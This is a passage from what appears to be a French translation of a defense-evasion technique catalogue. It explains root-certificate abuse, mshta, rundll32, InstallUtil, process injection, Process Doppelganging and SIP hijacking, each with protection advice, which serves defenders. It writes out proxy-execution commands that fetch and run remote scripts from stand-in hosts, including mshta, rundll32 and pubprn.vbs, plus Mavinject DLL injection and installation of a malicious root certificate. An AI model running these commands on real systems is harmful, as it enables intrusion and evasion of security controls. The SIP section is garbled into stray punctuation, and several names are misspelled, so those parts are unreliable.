utilisés pour désactiver ou restreindre l'accès des utilisateurs aux utilitaires qui peuvent être utilisés pour exécuter indirectement des commandes.Système: Windows, Linux, macOS
Droits: administrateur, utilisateur
Description: les certificats racine sont utilisés pour identifier une autorité de certification (CA). Lorsque le certificat racine est installé, le système et les applications approuveront tous les certificats de la chaîne de certificats racine. Les certificats sont généralement utilisés pour établir des connexions TLS / SSL sécurisées dans un navigateur Web. Si un utilisateur tente d'ouvrir un site sur lequel un certificat non approuvé est présenté, un message d'erreur apparaîtra pour avertir l'utilisateur d'un risque de sécurité. Selon les paramètres de sécurité, le navigateur peut interdire les connexions à des sites non approuvés.
L'installation d'un certificat racine dans un système attaqué permet à un attaquant de réduire le niveau global de sécurité du système. Les attaquants peuvent utiliser cette méthode pour masquer les avertissements de sécurité, ce qui permet à l'utilisateur de se connecter via HTTPS à des serveurs Web contrôlés par l'ennemi afin de voler ses informations d'identification.
Les certificats racine étrangers peuvent également être préinstallés par le fabricant du logiciel soit pendant la chaîne d'approvisionnement du logiciel et utilisés en conjonction avec des logiciels malveillants et des logiciels publicitaires, soit pour fournir une attaque «intermédiaire» pour intercepter les informations transmises via des connexions TLS / SSL sécurisées.
Les certificats racine peuvent également être clonés et réinstallés. de telles chaînes de certificats peuvent être utilisées pour signer du code malveillant afin de contourner les outils de vérification de signature utilisés pour bloquer et détecter les intrusions.
Sous macOS, le logiciel malveillant Ay MaMi utilise la commande
/ usr / bin / security add-trusted-cert -d -r trustRoot -k / Library / Keychains / System / keychain path / to / malveillant / cert pour définir le certificat comme certificat racine de confiance dans chaîne du système.
Recommandations de sécurité: l'épinglage de clé publique HTTP (HPKP) est un moyen de se protéger contre les attaques par chaîne de certificats. HPKP suppose que le serveur indique au client un ensemble de hachages de clé publique, qui devraient être les seuls approuvés lors de la connexion à ce serveur pendant un temps donné.
La stratégie de groupe Windows peut être utilisée pour gérer les certificats racine et empêcher les non-administrateurs d'installer des certificats racine supplémentaires dans les référentiels utilisateur (HKCU):
HKEY_LOCAL_MACHINE \ SOFTWARE \ Policies \ Microsoft \ SystemCertificates \ Root \ ProtectedRoots \ Flags = 1.Les certificats racine du système sont peu susceptibles de changer souvent, par conséquent, lors de la surveillance de nouveaux certificats, on peut détecter une activité malveillante ou s'assurer qu'il n'y a pas de certificats inutiles ou suspects. Microsoft fournit une liste de certificats racine approuvés via authroot.stl. L'utilitaire Sysinternals Sigcheck peut être utilisé pour vider le contenu du magasin de certificats (Sigcheck [64] .exe -tuv) et identifier les certificats non inclus dans la liste de confiance des certificats Microsoft.
Les certificats racine installés se trouvent dans le registre dans les sections suivantes:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ EnterpriseCertificates \ Root \ Certificates
HKEY_LOCAL_MACHINE [HKEY_CURRENT_USER] \ SOFTWARE [\ Policies] \ Microsoft \ SystemCertificates \ Root \ CertificatesIl existe un sous-ensemble de certificats racine qui sont constamment utilisés dans les systèmes Windows et qui peuvent être utilisés pour la surveillance:
• 18F7C1FCC3090203FD5BAA2F861A754976C8DD25;
• 245C97DF7514E7CF2DF8BE72AE957B9E04741E85;
• 3B1EFD3A66EA28B16697394703A72CA340A05BD5;
• 7F88CD7223F3C813818C994614A89C99FA3B5247;
• 8F43288AD272F3103B6FB1428485EA3014C0BCFE;
• A43489159A520F0D93D032CCAF37E7FE20A8B419;
• BE36A4562FB2EE05DBB3D32323ADF445084ED656;
• CDD4EEAE6000AC7F40C3802C171E30148030C072.
Système: Windows
Droits: utilisateur
Description: InstallUtil est un utilitaire de ligne de commande Windows qui peut installer et désinstaller des applications conformes aux spécifications du .NET Framework. Installutil est automatiquement installé avec VisualStudio. Le fichier InstallUtil.exe est signé par un certificat Microsoft et est stocké dans:
C: \ Windows \ Microsoft.NET \ Framework \ v [version] \ InstallUtil.exeLes attaquants peuvent utiliser la fonctionnalité InstallUtil pour exécuter le code proxy et contourner les listes blanches des applications.
Recommandations de protection: Il est possible qu'InstallUtil ne soit pas utilisé sur votre système, pensez donc à bloquer l'installation d'InstallUtil.exe.
Système: macOS
Droits: utilisateur, administrateur
Description: à partir d'OS X 10.8, l'en-tête LC_MAIN est inclus dans les exécutables mach-O, qui indique le point d'entrée du code binaire pour l'exécuter. Dans les versions antérieures, deux en-têtes LC_THREAD et LC_UNIXTHREAD étaient utilisés. Le point d'entrée du binaire peut être modifié et un ajout malveillant sera initialement effectué, puis l'exécution reviendra au point de départ afin que la victime ne remarque rien. Une telle modification des fichiers binaires est un moyen de contourner la liste blanche des applications, car le nom de fichier et le chemin d'accès à l'application resteront inchangés.
Recommandations de protection: utilisez des applications qui n'ont que des signatures numériques valides de développeurs de confiance. La modification de l'en-tête LC_MAIN invalidera la signature du fichier et modifiera la somme de contrôle du fichier.
Système: macOS
Droits: utilisateur, administrateur
Description: Launchctl - un utilitaire pour gérer le service Launchd. À l'aide de Launchctl, vous pouvez gérer les services système et utilisateur (LaunchDeamons et LaunchAgents), ainsi qu'exécuter des commandes et des programmes. Launchctl prend en charge les sous-commandes de ligne de commande, interactives ou redirigées à partir de l'entrée standard:
launchctl submit -l [nom_étiquette] - / Chemin / vers / chose / vers / exécuter '' arg "'' arg" '' arg " .
En démarrant et en redémarrant les services et les démons, les attaquants peuvent exécuter du code et même contourner la liste blanche si launchctl est un processus autorisé, cependant le chargement, le déchargement et le redémarrage des services et des démons peuvent nécessiter des privilèges élevés.
Recommandations de sécurité: limitation des droits des utilisateurs pour créer des agents de lancement et lancer des démons de lancement à l'aide d'une stratégie de groupe. En utilisant l'application
KnockKnock ,
vous pouvez découvrir des programmes qui utilisent launchctl pour gérer les agents de lancement et les démons de lancement.
Système: Windows, Linux, macOS
Description: Le masquage se produit lorsque le nom ou l'emplacement d'un fichier exécutable, légal ou malveillant, est soumis à diverses manipulations et abus afin de contourner la protection. Plusieurs options de masquage sont connues.
Une option consiste à placer l'exécutable dans un répertoire généralement accepté ou à lui donner le nom d'un programme légitime et approuvé. Le nom de fichier peut être similaire au nom d'un programme légitime. Cette méthode de masquage est utilisée pour contourner les outils qui approuvent les fichiers en fonction du nom ou du chemin d'accès au fichier, ainsi que pour tromper les administrateurs système.
WindowsUn autre moyen de maximiser consiste pour un attaquant à utiliser une copie modifiée d'un utilitaire légitime, tel que rundll32.exe. Dans ce cas, un utilitaire légitime peut être déplacé vers un autre répertoire et renommé pour éviter la détection basé sur la surveillance du lancement des utilitaires système à partir d'emplacements non standard.
Un exemple d'abus de répertoires approuvés dans Windows est le répertoire C: \ Windows \ System32. Les noms des utilitaires système approuvés tels que explorer.exe ou svchost.exe peuvent être attribués à des fichiers binaires malveillants.
LinuxLa méthode suivante de masquage consiste à utiliser des fichiers binaires malveillants qui, après le démarrage, changent le nom de leur processus en nom de processus légitime et fiable. Un exemple de répertoire de confiance sous Linux est le répertoire / bin et des noms tels que rsyncd ou dbus-inotifier peuvent être des noms de confiance.
Recommandations de sécurité
: lors de la création de diverses règles de sécurité, évitez les exceptions basées sur le nom et le chemin du fichier. Nécessite la signature de fichiers binaires. Utilisez les contrôles d'accès au système de fichiers pour protéger les répertoires approuvés, tels que C: \ Windows \ System32. N'utilisez pas d'outils pour restreindre l'exécution des programmes en fonction du nom ou du chemin d'accès au fichier.
Identifiez et bloquez les logiciels potentiellement dangereux et malveillants qui peuvent ressembler à un programme légitime.
Système: Windows
Droits: utilisateur, administrateur, système
Description: les attaquants peuvent modifier le registre pour masquer des informations dans les clés de registre ou pour supprimer des informations lors du nettoyage des traces d'une invasion ou à d'autres stades de l'attaque.
L'accès à certaines zones du registre dépend des autorisations du compte. L'utilitaire Reg intégré peut être utilisé pour la modification du registre local et distant. D'autres outils d'accès à distance qui interagissent avec le registre via l'API Windows peuvent être utilisés.
Les modifications apportées au registre peuvent inclure des actions pour masquer les clés, par exemple, en ajoutant des clés avec un nom à partir d'un caractère nul. La lecture d'une telle clé via Reg ou API entraînera une erreur ou sera ignorée. Les attaquants peuvent utiliser ces pseudo-clés cachées pour masquer la charge utile et les commandes utilisées dans le processus de consolidation dans le système.
Le registre du système distant peut également être modifié si le service d'enregistrement à distance est actif sur le système cible. En règle générale, un attaquant a également besoin d'informations d'identification valides, ainsi que d'un accès aux partages d'administration Windows pour utiliser RPC.
Recommandations de protection: Un réglage incorrect des autorisations dans le registre peut conduire au fait qu'un attaquant pourrait exécuter du code arbitraire (
Service Registry Permissions Feakness ). Assurez-vous que les utilisateurs ne peuvent pas modifier les clés des composants système. Bloquez les utilitaires système inutiles et autres logiciels pouvant être utilisés pour modifier le registre. Envisagez d'activer l'audit du registre (ID d'événement4657), mais n'oubliez pas que les modifications du registre effectuées à l'aide d'outils tels que RegHide ne seront pas enregistrées par le service de collecte d'événements du système d'exploitation.
Système: Windows
Droits: utilisateur
Description: Mshta.exe (situé dans
C: \ Windows \ System32 \ ) est un utilitaire qui exécute des applications HTML Microsoft (* .HTA). Les applications HTA fonctionnent avec les mêmes technologies qu'InternetExplorer, mais en dehors du navigateur. Étant donné que Mshta traite les fichiers en contournant les paramètres de sécurité du navigateur, les attaquants peuvent utiliser mshta.exe pour proxy l'exécution de fichiers HTA malveillants, Javascript ou VBScript. Le fichier malveillant peut être lancé via le script intégré:
mshta vbscript: Close (Execute (script "GetObject (" ": https [:] // webserver / payload [.] sct" ")"))))ou directement, Ă l'URL:
mshta http [:] // webserver / payload [.] htaRecommandations de protection: la fonctionnalité de mshta.exe est associée aux anciennes versions d'IE qui ont atteint la fin de leur cycle de vie. Bloquer Mshta.exe si vous n'utilisez pas ses fonctionnalités.
Système: Windows
Description: la section NTFS contient la table de fichiers maîtres (MFT), qui stocke des données sur le contenu du volume, les lignes correspondent aux fichiers et les colonnes à leurs attributs, y compris des attributs tels que les attributs étendus (EA) - une chaîne de 64 ko) et Flux alternatifs (Alternate Data Streams (ADS) - métadonnées de taille arbitraire) qui peuvent être utilisés pour stocker toutes les données. Les attaquants peuvent stocker des données malveillantes et des fichiers binaires dans des attributs étendus et des métadonnées de fichier. Cette technique vous permet de contourner certains outils de protection, tels que les outils d'analyse basés sur des indicateurs statiques et certains outils antivirus.
Recommandations de protection: le blocage de l'accès à EA et ADS peut être assez complexe et inapproprié et, en outre, conduire à un fonctionnement instable de la fonctionnalité standard du système d'exploitation. Dirigez le vecteur de protection pour empêcher le démarrage du logiciel, avec lequel vous pouvez masquer des informations dans EA et ADS.
Système: Windows
Droits: administrateur, utilisateur
Description: les connexions aux dossiers réseau et au partage administrateur Windows peuvent être supprimées si elles ne sont plus nécessaires. Net est un exemple d'utilitaire qui peut être utilisé pour supprimer des connexions réseau:
net use \ system \ share / delete . Les opposants peuvent supprimer les connexions réseau dont ils n'ont pas besoin pour effacer les traces d'intrusion.
Conseils de sécurité: suivez les meilleures pratiques pour organiser les partages d'administration Windows. Identifiez les utilitaires système et les logiciels inutiles qui peuvent être utilisés pour vous connecter aux partages réseau et envisagez de vérifier son utilisation ou son blocage.
Système: Windows, Linux, macOS
Description: les attaquants peuvent utiliser le chiffrement, le chiffrement et toutes sortes de méthodes pour obscurcir les fichiers et leur contenu dans le système ou pendant leur transfert.
Les charges utiles peuvent être archivées ou chiffrées, parfois pour leur désobfuscation et leur lancement ultérieur, une action de l'utilisateur est requise, par exemple, la saisie d'un mot de passe pour ouvrir une archive préparée par un attaquant.
Pour masquer des lignes de texte brut, des parties de fichiers peuvent également être encodées. Les charges utiles peuvent être divisées en fichiers «bénins» distincts qui, lorsqu'ils sont assemblés dans leur ensemble, exécutent des fonctionnalités malveillantes.
Les adversaires peuvent également masquer les commandes appelées à partir de charges utiles directement ou via l'interface de ligne de commande. Les variables d'environnement, les alias et les caractères spécifiques à la plate-forme ou à la sémantique des langues peuvent être utilisés pour contourner la détection des logiciels malveillants en fonction des signatures et des listes blanches.
Un autre exemple d'obscurcissement est l'utilisation de la stéganographie - la technique consistant à masquer des données ou du code dans des images, des pistes audio, des fichiers vidéo et texte.
Recommandations de protection: utilisez des outils d'analyse et de détection de logiciels malveillants qui vérifient non seulement le code source lui-même, mais analysent également le processus d'exécution des commandes. Dans Windows 10, cette fonctionnalité est présentée comme l'interface de scan anti-programme malveillant (AMSI).
La présence de caractères d'échappement dans les commandes, telles que ^ ou ", peut servir d'indicateur d'obscurcissement. À l'aide de Windows Sysmon et de l'événement ID d'événement 4688, vous pouvez afficher les arguments des commandes exécutées dans divers processus.
L'obfuscation utilisée dans les charges utiles pendant la phase d'accès initiale peut être détectée sur le réseau à l'aide du système IDS et des passerelles de sécurité de messagerie qui identifient les données et les scripts compressés et chiffrés dans les fichiers joints. L'identification des charges utiles transmises via une connexion cryptée à partir d'un site Web peut être effectuée en inspectant le trafic crypté.
Système: macOS
Droits: utilisateur, administrateur
Description: Les attaquants peuvent modifier les fichiers plist en leur spécifiant leur propre code pour son exécution dans le contexte d'un autre utilisateur. Les fichiers de propriétés plist situés dans / Library / Preferences sont exécutés avec des privilèges élevés, et les fichiers plist de ~ / Library / Preferences sont exécutés avec des privilèges utilisateur.
Conseils de sécurité
: EmpĂŞchez la modification des fichiers plist en les rendant en lecture seule.
Système: Linux, macOS
Droits: utilisateur
Description: les attaquants peuvent utiliser les méthodes de détournement de port pour masquer les ports ouverts qu'ils utilisent pour se connecter au système.
Conseils de
sécurité: l' utilisation de pare-feu avec état peut empêcher la mise en œuvre de certaines options de détournement de port.
Système: Windows
Droits: utilisateur, administrateur, système
Description: Transactional NTFS (TxF) est une technologie introduite pour la première fois dans Vista qui permet des opérations de fichiers à l'aide de transactions. Dans TxF, un seul descripteur de transaction peut écrire le fichier pour le moment, tous les autres descripteurs seront isolés et ne pourront lire que la version du fichier qui a été verrouillée au moment de l'ouverture. Si le système ou l'application plante, alors TxF annulera automatiquement les modifications apportées au fichier. TxF est toujours inclus dans Windows 10.
Technique Process Doppelganging (de l'allemand «transmission en deux étapes», «double coup») implique l'utilisation de fonctions WinAPI non documentées et est implémenté en 4 étapes:
- Transaction Une transaction NTFS est créée à l'aide de l'exécutable attaqué et une version modifiée temporaire de l'exécutable est créée dans le cadre de la transaction.
- Téléchargez Une section partagée est créée en mémoire dans laquelle une version modifiée du fichier exécutable est chargée.
- Rollback. La transaction NTFS est annulée, à la suite de laquelle le fichier attaqué d'origine est enregistré sur le disque dans sa forme d'origine.
- L'animation. En utilisant une version modifiée du fichier exécutable qui reste dans la RAM, un processus est créé et son exécution est lancée.
Ainsi, un code malveillant fonctionnera dans le contexte d'un processus de confiance légitime. Étant donné que l'attaque se produit uniquement en mémoire, car Une transaction NTFS n'est pas terminée, mais est annulée, aucune trace d'activité malveillante ne restera sur le disque.
Conseils de sécurité: des mesures de sécurité préventives sous la forme de tentatives de blocage de certains appels d'API sont susceptibles d'avoir des effets secondaires négatifs. Le vecteur de protection doit viser à empêcher le lancement d'outils malveillants aux premiers stades de la chaîne d'attaque. Le doppelganging peut être utilisé pour contourner les fonctions de sécurité, mais il est toujours recommandé de bloquer les applications potentiellement dangereuses et de limiter l'utilisation de logiciels à l'aide de listes blanches. La détection des attaques est effectuée en analysant les appels aux fonctions API CreateTransaction, CreateFileTransacted, RollbackTransaction, les fonctions non documentées comme NTCreateProcessEX, NtCreateThreadEX et les appels API utilisés pour changer de mémoire dans un autre processus, tel que WriteProcessMemory.
Système: Windows
Droits: utilisateur
Description: L' attaque est réalisée en substituant l'image du fichier exécutable du processus lors de la suspension du processus. Il fait partie des dix techniques de base pour les processus d'injection .Conseils de sécurité: des mesures de sécurité préventives sous la forme de tentatives de blocage de certains appels d'API sont susceptibles d'avoir des effets secondaires négatifs. Le vecteur de protection doit viser à empêcher le lancement d'outils malveillants aux premiers stades de la chaîne d'attaque. Process Hollowing peut être utilisé pour contourner les fonctionnalités de sécurité, mais il reste de bonne pratique de bloquer les applications potentiellement dangereuses et de limiter l'utilisation de logiciels à l'aide de listes blanches.Système: Windows, Linux, macOSDroits: utilisateur, administrateur, système, racineDescription: l'injection de processus est une méthode d'exécution de code arbitraire dans l'espace d'adressage d'un processus vivant distinct. L'exécution de code dans le contexte d'un autre processus vous permet d'accéder à la mémoire du processus injecté, aux ressources système / réseau et éventuellement à des privilèges élevés. Les injections de processus peuvent également être utilisées pour éviter la détection éventuelle d'activités malveillantes par des moyens de sécurité. Les techniques de mise en œuvre des injections dans les processus sont basées sur l'utilisation abusive de divers mécanismes qui assurent le multithreading de l'exécution du programme dans le système d'exploitation. Voici quelques approches pour injecter du code dans un processus.Windows• Injections de DLL. Ils sont effectués en écrivant le chemin vers la DLL malveillante à l'intérieur du processus, puis en l'exécutant en créant un thread distant (thread distant - un thread qui s'exécute dans l'espace d'adressage virtuel d'un autre processus). En d'autres termes, le logiciel malveillant écrit la DLL sur le disque, puis utilise une fonction comme CreateRemoteTread, qui appellera la fonction LoadLibrary dans le processus injecté.• Les injections PE (injection exécutable portable) sont basées sur l'abus des fonctionnalités d'exécution de la mémoire des fichiers PE, tels que DLL ou EXE. Le code malveillant est écrit dans le processus sans écrire de fichiers sur le disque, puis l'exécution est appelée à l'aide du code supplémentaire ou en créant un flux distant.• Le détournement de l'exécution des threads implique l'injection de code malveillant ou de chemins DLL directement dans le thread de processus. Comme la technique Process Hollowing, l'écoulement doit d'abord être suspendu.• L'injection dans une injection d'appel de procédure asynchrone (APC) implique l'incorporation de code malveillant dans la file d'attente APC d'un thread de processus. L'une des méthodes d'injection APC, appelée «injection Earle Bird», implique la création d'un processus suspendu dans lequel du code malveillant peut être écrit et lancé au point d'entrée du processus via APC. AtomBombing est une autre option d'injection qui utilise APC pour appeler du code malveillant précédemment écrit dans la table atomique globale.• Les injections d'injection TLS (Thread Local Storage) impliquent la manipulation de pointeurs de mémoire dans un fichier PE exécutable pour rediriger le processus vers du code malveillant.Mac et Linux• Les variables système LD_RPELOAD, LD_LIBRARY_PATH (Linux), DYLIB_INSERT_LIBRARIES (macOS X) ou l'interface de programmation d'application (API) dlfcn peuvent être utilisées pour charger dynamiquement une bibliothèque (objet partagé) dans un processus, qui à son tour peut être utilisé pour intercepter des appels d'API à partir de processus en cours.• L'appel système Ptrace peut être utilisé pour se connecter à un processus en cours d'exécution et le modifier pendant son exécution.• / proc / [pid] / mem donne accès à la mémoire du processus et peut être utilisé pour lire / écrire des données arbitraires, cependant cette méthode est rarement utilisée en raison de la complexité de sa mise en œuvre.• La capture VDSO (Virtual shared shared object) vous permet d'injecter du code lors de l'exécution des binaires ELF en manipulant les talons de code de linux-vdso.so.Les programmes malveillants utilisent généralement l'injection de code dans un processus pour accéder aux ressources du système, ce qui permet à un attaquant de prendre pied dans le système et d'effectuer d'autres modifications dans l'environnement attaqué. Des échantillons plus complexes peuvent effectuer plusieurs injections de processus pour les rendre difficiles à détecter.Recommandations de protection:Les méthodes d'injection de code dans les processus reposent sur l'abus de fonctions régulières du système d'exploitation, dont l'impact direct peut conduire à un fonctionnement instable des logiciels et produits de sécurité légitimes. Les efforts visant à empêcher l'utilisation de techniques d'interception doivent se concentrer sur les premiers stades de la chaîne d'attaque. Utilisez des outils pour bloquer les logiciels potentiellement dangereux, tels que AppLocker. Utilisez Yama comme mesure préventive contre l'injection de code dans ptrace, en limitant l'utilisation de ptrace aux utilisateurs privilégiés uniquement. Des mesures de sécurité supplémentaires peuvent inclure le déploiement de modules de sécurité du noyau qui fournissent un contrôle d'accès avancé et une restriction de processus. Ces outils incluent SELinux, grsecurity, AppArmor.Système: Windows, Linux, macOSDroits: utilisateur, administrateur, description du système:Les attaquants peuvent utiliser simultanément plusieurs outils d'accès à distance avec différents protocoles de contrôle afin de diversifier les risques de détection. Ainsi, si l'un des outils d'accès à distance est détecté et bloqué, mais que la partie défenderesse n'a pas identifié tous les outils de l'attaquant, l'accès à distance au réseau attaqué sera toujours préservé. Les attaquants peuvent également essayer d'accéder à des comptes valides de services d'entreprise distants, tels que des VPN, pour obtenir un accès alternatif au système en cas de blocage des outils de base d'accès à distance. L'utilisation d'un shell Web est également l'un des moyens d'accéder à distance à un réseau via un serveur Web.Recommandations de protection:Surveillez la présence et le blocage du lancement d'outils d'accès à distance connus dans votre réseau (AmmyAdmin, Radmin, RemotePC, VNC, etc.), utilisez des outils pour contrôler le lancement d'applications et bloquer les logiciels potentiellement dangereux. L'introduction de systèmes IDS et IPS qui détectent des logiciels malveillants spécifiques à l'aide de signatures réduira la probabilité d'une attaque réussie, mais au fil du temps, les attaquants modifieront leurs outils pour modifier la signature et, par conséquent, contourneront les systèmes IDS et IPS.Système: Droits Windows : Utilisateur, AdministrateurDescription: Regsvcs et Regasm sont des utilitaires utilitaires Windows utilisés pour s'inscrire auprès du système d'assemblage .NET Component Object Model (COM). Les deux fichiers sont signés numériquement par Microsoft. Les attaquants peuvent utiliser Regsvcs et Regasm pour exécuter le code proxy lorsque l'attribut est le code qui doit être exécuté avant l'enregistrement ou la désinscription: [ComRegisterFunction] ou [ComUnregisterFunction]. Le code avec de tels attributs peut être lancé même si le processus s'exécute avec des privilèges insuffisants ou même se bloque au démarrage.Recommandations de protection: bloquez Regsvcs.exe et Regasm.exe s'ils ne sont pas utilisés sur votre système ou réseau.Système: Windows, Linux, macOSDroits: administrateur, système, racineDescription: Les rootkits sont des programmes qui cachent la présence de logiciels malveillants en interceptant et en modifiant les appels d'API. Les rootkits peuvent fonctionner au niveau de l'utilisateur, du noyau du système d'exploitation, ou même au-dessous, au niveau d'un hyperviseur, d'un MBR ou d'un microprogramme système. Les opposants utilisent des rootkits pour masquer la présence de programmes, fichiers, connexions réseau, pilotes et autres composants du système d'exploitation.Recommandations de protection: identifiez et bloquez les logiciels potentiellement dangereux pouvant contenir des rootkits à l'aide d'outils de mise en liste des logiciels, d'outils antivirus ou d'outils de protection du système d'exploitation intégrés.Système: Droits Windows :Description de l' utilisateur : Rundll32.exe est un utilitaire système pour lancer des programmes situés dans des bibliothèques connectées dynamiquement; il peut être appelé pour un fichier binaire proxy, exécuter des fichiers de contrôle Windows (.cpl) via des fonctions Shel32.dll non documentées - Control_RunDLL et Control_RunDLLAsUser . Un double-clic sur le fichier .cpl entraîne également l'exécution de Rundll32.exe. Rundll32 peut également être utilisé pour exécuter des scripts tels que JavaScript:rundll32.exe javascript: "\ .. \ mshtml, RunHTMLApplication"; document.write (); GetObject ("scrirpt: https [:] // www [.] Exemple [ .] com / malveillant.sct ")"La méthode ci-dessus d'utilisation de rundll32.exe est détectée par un logiciel antivirus comme un virus comme Poweliks.Recommandations de protection: Attack Surface Reduction (ASR) dans EMET et Advanced Theart Protection dans Windows Defender peuvent bloquer l'utilisation de Rundll32.exe pour contourner la liste blanche.Système: Droits Windows : Administrateur,Description du système : Les attaquants peuvent modifier les composants de l'architecture pour signer et vérifier la signature numérique du code Windows pour contourner les moyens de contrôler le lancement de programmes qui autorisent uniquement l'exécution de code signé. Pour créer, signer et vérifier la signature de fichiers de différents formats dans Windows, le soi-disant Package d'Interface Sujet (SIP) est utilisé - des spécifications logicielles qui sont uniques pour chaque type de fichier, à travers lesquelles l'interaction entre les fonctions API qui initient la création, le calcul et la vérification des signatures et directement fichiers. La validité de la signature est confirmée en utilisant ce que l'on appelle le Trust Provider.- Ce sont des composants logiciels de l'OS qui exécutent diverses procédures liées au calcul et à la vérification des signatures numériques.Méthodes d'attaque populaires:- Modification des clés DLL et FuncName dans la section CryptSIPDllGetSignedDataMsg :
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Cryptography \ OID \ EncodingType 0 \ CryptSIPDllGetSignedDataMsg \ [SIP_GUID] .
Il est effectué dans le but de remplacer la bibliothèque de DLL qui fournit la fonction CryptSIPDllGetSignedDataMSG , . (, Microsoft ) SIP. , , , , , , , . - DLL FuncName :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData/[SIP_GUID] .
DLL-, CryptSIPDllVerifyIndirectData , , , , , (True/False). , c SIP. , DLL-. - DLL FuncName :
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\Providers\Trust\FinalPolicy/[Trust Provider GUID] .
DLL-, FinalPolicy Trust Provider, , . CryptSIPDllVerifyIndirectData, DLL-.
Il est important de noter que l'attaque décrite sur le mécanisme de confiance de Windows peut être implémentée à l'aide de la technique de détournement de commande de recherche de DLL.Recommandations de protection: assurez-vous que les utilisateurs du système protégé ne peuvent pas modifier les clés de registre liées aux composants SIP et Trust Provider. Envisagez de supprimer les SIP inutiles et obsolètes. Utilisez toutes sortes de moyens pour bloquer le téléchargement de DLL malveillantes, par exemple celles intégrées à Windows AppLocker et DeviceGuard.Système: Windows, Linux, macOSDroits: Description de l' utilisateur : Les attaquants peuvent utiliser des scripts pour automatiser leurs actions, accélérer les tâches opérationnelles et, par conséquent, réduire le temps nécessaire pour y accéder. Certains langages de script peuvent être utilisés pour contourner les mécanismes de surveillance des processus en interagissant directement avec le système d'exploitation au niveau de l'API au lieu d'appeler d'autres programmes. Les scripts peuvent être intégrés dans des documents Office sous forme de macros, puis utilisés pour des attaques de phishing. Dans ce cas, les attaquants s'attendent à ce que l'utilisateur exécute le fichier de macro ou que l'utilisateur accepte d'activer la macro. Il existe plusieurs cadres populaires pour implémenter les scripts - Metasploit, Veil, PowerSploit.Conseils de sécurité: limitez l'accès aux scripts tels que VBScript ou PowerShell. Sous Windows, configurez les paramètres de sécurité de MS Office en activant l'affichage sécurisé et l'interdiction des macros via GPO. Si des macros sont nécessaires, autorisez uniquement l'exécution de macros signées numériquement approuvées. Utilisez la micro-segmentation et la virtualisation des applications, par exemple, Sandboxie pour Windows et Apparmor, Docker pour Linux.Système: Droits Windows : UtilisateurDescription: Les fichiers binaires signés avec des certificats numériques approuvés peuvent être exécutés sur des systèmes Windows protégés par une vérification de signature numérique. Plusieurs fichiers Microsoft signés par défaut lors de l'installation de Windows peuvent être utilisés pour proxy le lancement d'autres fichiers:• Mavinject.exe est un utilitaire Windows qui permet d'exécuter du code. Mavinject peut être utilisé pour entrer la DLL dans le processus en cours d'exécution:"C: \ Program Files \ Fichiers communs \ microsoft shared \ ClickToRun \ MavInject32.exe" [PID] / INJECTRUNNING [PATH DLL];C: \ Windows \ system32 \ mavinject.exe [PID] / INJECTRUNNING [PATH DLL];• SyncAppvPublishingServer.exe - peut être utilisé pour exécuter des scripts PowerShell sans exécuter PowerShell.exe.Il existe plusieurs autres fichiers binaires similaires .Recommandations de protection: de nombreux fichiers signés peuvent ne pas être utilisés sur votre système, pensez donc à bloquer leur lancement.Système: Droits Windows : UtilisateursDescription: Les scripts signés avec des certificats approuvés peuvent être utilisés pour proxyer des fichiers malveillants, par exemple, PubPrn.vbs est signé avec un certificat Microsoft et peut être utilisé pour exécuter un fichier à partir d'un serveur distant:cscript C: \ Windows \ System32 \ Printing_Admin_Scripts \ ru-RU \ pubprn.vbs 127.0.0.1 script: http [:] // 192.168.1.100/hi.pngRecommandations de protection: De tels scripts signés peuvent ne pas être requis sur votre système, pensez donc à bloquer leur lancement.Système: WindowsDescription:L'empaquetage logiciel implique l'utilisation par l'adversaire de méthodes de compression ou de chiffrement pour les fichiers exécutables, entraînant une modification de la somme de contrôle du fichier, ce qui évite la détection basée sur la recherche de signatures statiques. La plupart des méthodes de décompression décompressent le code exécutable en mémoire. Exemples d'utilitaires populaires - les compresseurs de fichiers exécutables sont MPRESS et UPS, cependant, il existe de nombreux autres compresseurs connus.En outre, les opposants peuvent créer leurs propres méthodes de conditionnement qui ne laisseront pas de tels artefacts comme des compresseurs bien connus. Empaqueter des fichiers exécutables n'est pas un indicateur clair de malware, car les développeurs de logiciels légitimes peuvent utiliser des méthodes d'empaquetage pour réduire la taille du package de distribution ou protéger le code propriétaire.Recommandations de protection:Mettez à jour les outils de protection antivirus, créez des signatures personnalisées pour la détection des logiciels malveillants et utilisez des méthodes de détection heuristique. Identifiez et bloquez les logiciels potentiellement dangereux.Système: Linux, macOSDroits: Description de l' utilisateur:Les attaquants peuvent masquer le vrai type d'un fichier en modifiant son extension. Pour certains types de fichiers (ne fonctionne pas avec les fichiers .app), l'ajout d'un caractère espace à la fin du nom de fichier changera la façon dont le fichier est traité par le système d'exploitation. Par exemple, s'il existe un fichier exécutable Mach-O avec le nom evil.bin, alors lorsque l'utilisateur double-clique, le système d'exploitation lancera Terminal.app et l'exécutera. Si le même fichier est renommé evil.txt, alors avec un double-clic il démarrera dans un éditeur de texte. Cependant, si le fichier est renommé «evil.txt» (espace à la fin), puis en double-cliquant sur le type du vrai fichier, le système d'exploitation sera déterminé et le fichier binaire démarrera. Les attaquants peuvent utiliser cette technique pour inciter un utilisateur à lancer un fichier exécutable malveillant.Recommandations de protection:L'utilisation de cette technique est difficile à empêcher car un attaquant utilise des mécanismes de fonctionnement standard du système d'exploitation, par conséquent, le vecteur de protection doit viser à empêcher des actions malveillantes à des stades antérieurs de l'attaque, par exemple, au stade de la livraison ou de la création d'un fichier malveillant dans le système.Système: Windows, LinuxDroits: utilisateur, administrateur, systèmeDescription: Timestomp est une modification des horodatages du fichier (modification, accès, création). Souvent, les méthodes d'horodatage sont utilisées pour masquer les fichiers qui ont été modifiés ou créés par un attaquant afin qu'ils ne soient pas visibles par les experts en criminalistique et les outils de criminalistique. L'horodatage peut être utilisé conjointement avec le masquage de nom de fichier pour masquer les logiciels malveillants et les outils d'intrusion.Recommandations de protection:Dirigez le vecteur de protection pour empêcher le lancement de logiciels potentiellement dangereux et malveillants. La criminalistique décrit les méthodes d'organisation des outils pour détecter la modification des horodatages en collectant des informations sur l'ouverture d'un descripteur de fichier et en les faisant correspondre avec les horodatages spécifiés dans le fichier.Système: Droits Windows : UtilisateurDescription: Il existe de nombreux utilitaires utilisés par les développeurs de logiciels et qui peuvent être utilisés pour exécuter du code sous diverses formes lors du développement de logiciels, du débogage et de la rétro-ingénierie. Ces utilitaires sont 